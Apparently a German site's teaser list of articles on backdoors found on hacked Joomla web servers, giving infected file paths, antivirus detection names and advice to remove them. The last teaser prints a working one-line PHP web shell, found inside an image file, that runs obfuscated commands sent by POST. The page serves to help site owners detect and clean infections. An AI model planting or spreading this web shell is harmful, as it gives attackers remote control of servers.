Artikel:
- Verzeichnis: \downloads\
- Datei: dirs.php.suspected
- Datei: dirs.php
lt. Microsoft Security Essentials
Backdoor:PHP/Small.M
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
weiterlesen ...
Artikel:
- Verzeichnis: \includes\
- Datei: doc.php
lt. Microsoft Security Essentials
Backdoor:PHP/Small.P
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
weiterlesen ...
Artikel:
- Verzeichnis: \aa\libraries\
- Datei: gallery.php.suspected
- Datei: gallery.php
lt. Microsoft Security Essentials
Backdoor:PHP/Small.M
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
weiterlesen ...
Artikel:
- Verzeichnis: \forum\
- Datei: index.php
lt. Microsoft Security Essentials
Backdoor:PHP/Small.M
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
Im konkretem Fall wurde der Schadcode in die vorhandene index.php eingefügt.
weiterlesen ...
Artikel:
- Verzeichnis: \temp\u\a\
- Datei: list.php.suspected
lt. Microsoft Security Essentials
Backdoor:PHP/Small.M
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
weiterlesen ...
Artikel:
- Verzeichnis: \down\
- Datei: session.php
- Datei: session.php.suspected
lt. Microsoft Security Essentials
Backdoor:PHP/Small.M
Kategorie: Hintertür
Beschreibung: Dieses Programm stellt einen Remotezugriff auf den Computer bereit, auf dem es installiert ist.
Empfohlene Aktion: Entfernen Sie diese Software unverzüglich.
weiterlesen ...
Artikel:
"Hilfe mein Server wurde gehackt!"
Durch eine Sicherheitslücke im Joomla-Core konnte fremder Code eingeschleust werden.
Kurz vor Weihnachten 2015 wurden viele Joomla-Installationen angegriffen. Es gab auch sehr schnell ein Sicherheitsupdate, aber das musste erstmal installiert werden.
Wer zulange gewartet hat, hat dann auch prompt fremden Code auf seinem Server entdeckt. Meist aber erst, als der Server bereits als SPAM-Schleuder eifrig Mails versendet hat!
weiterlesen ...
Artikel:
Die Datei thumb_j2.php5.jpg gefunden im Verzeichnis images gehört jedenfalls nicht dorthin. Das Bild enthält zudem den nachfolgenden Code:
<?php @assert(@base64_decode(@str_rot13($_POST["data"])));?>
Unabhängig davon ist die Datei ein Bild und wird als solches angezeigt.
Wie ist die Datei auf den Server gekommmen?
Im konkreten Fall wurde die befallene Homepage in Joomla 2.5.14 erstellt und seit der Erstellung nicht upgedatet.
weiterlesen ...